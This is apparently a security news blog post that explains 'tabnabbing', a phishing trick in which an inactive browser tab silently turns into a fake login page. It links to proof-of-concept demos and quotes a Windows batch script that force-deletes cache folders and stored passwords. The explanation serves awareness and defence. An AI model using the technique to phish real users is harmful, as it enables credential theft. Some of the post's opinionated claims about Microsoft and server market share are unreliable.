|Home » Industry Watch
A new type of exploit.
All that's required is you surf to the wrong kind of (or infected) website to begin with.
The discovery was made by Aza Raskin who is a project leader for Firefox. Raskin has a 'proof of concept' page online so you can test yourself. The POC is not sophisticated but actual attacks would be.
This is how it works.
- You surf to the 'wrong' type of site. This can also be a website (such as Microsoft IIS/ASP) that's been infected.
- You 'tab away' from your current tab and into a new one.
- After a predefined time interval (five seconds in the POC) the tab you just left magically changes into a page for one of your secure sites such as your bank's or Gmail or whatever. (The POC uses a screen dump mockup of Gmail.)
- The title in the old tab changes too but most likely you won't notice this. (But if you keep your eyes peeled when running the POC and count slowly to 'five' you'll see it.)
- The 'favicon' can also change too on several browser platforms.
- You'll appear (for example) to be logged out of your other site when you return to the tab.
- You reenter your login credentials and you're back in.
But the joke is you were never logged out in the first place. The second joke is the phishers now have your login credentials because you just gave them away.
Aviv Raff has put together an even hastier POC that shows the trick works with various FF add-ons such as NoScript. At the present time some of these tricks aren't good enough to fool everyone but given a little time they very well may be.
Mitigating this attack isn't easy. Avoiding sleazy sites is a start; avoiding sites that can easily be hacked (particularly Redmond's) can also be a help. And the good news is only about 30% of web servers run their software anyway.
Other things that cannot work (and will only lull you into a false sense of security):
√ Using a live CD. Live CDs are good and prevent you from being exploited by malware already resident on your computer. But this attack has nothing to do with your computer. It's based totally on what's found on a web page. If you surf to the wrong type of site, you're still going to be hit.
√ Running Windows/IE and cleaning caches. Unbelievably enough, a user claiming '14+' years experience claimed the following script was adequate in protecting Windows XP systems.
@rem Close all open programs before running
@rem %username% - applies to currently logged in user, can be replaced with specific profile username
@rem Removes Adobe Flash Player cache and cookie directories
rmdir /S /Q 'C:\Documents and Settings\%username%\Application Data\Adobe\Flash Player'
rmdir /S /Q 'C:\Documents and Settings\%username%\Application Data\Macromedia'
@rem Clears User Profile 'Temp' folder files
del /F /Q 'C:\Documents and Settings\%username%\Local Settings\Temp'
@rem Clears IE Temporary Internet Files, Cookies, History, Form Data, and Stored passwords
@rem (Applies only to IE7 and newer)
rundll32.exe InetCpl.cpl,ClearMyTracksByProcess 255
@rem Prompts to press any key to continue (to see whether previous command finished before continuing)
@rem Exits batch file
See the links below for the proofs of concept. The second one by Aviv Raff will merely show how Firefox add-ons can be circumvented. Keep your eyes on the first one: surf to the link, open a new tab but keep an eye on the old one, and count slowly to five.
'It all starts with being disciplined in not only setting up multiple layers of defense (defense in depth) but also in operating the computers in a way to ensure they remain clean. I've been doing so for 14+ years.'
Aza on Design: A New Type of Phishing Attack
Aviv Raff: Devious New Phishing Attack Targets Tabs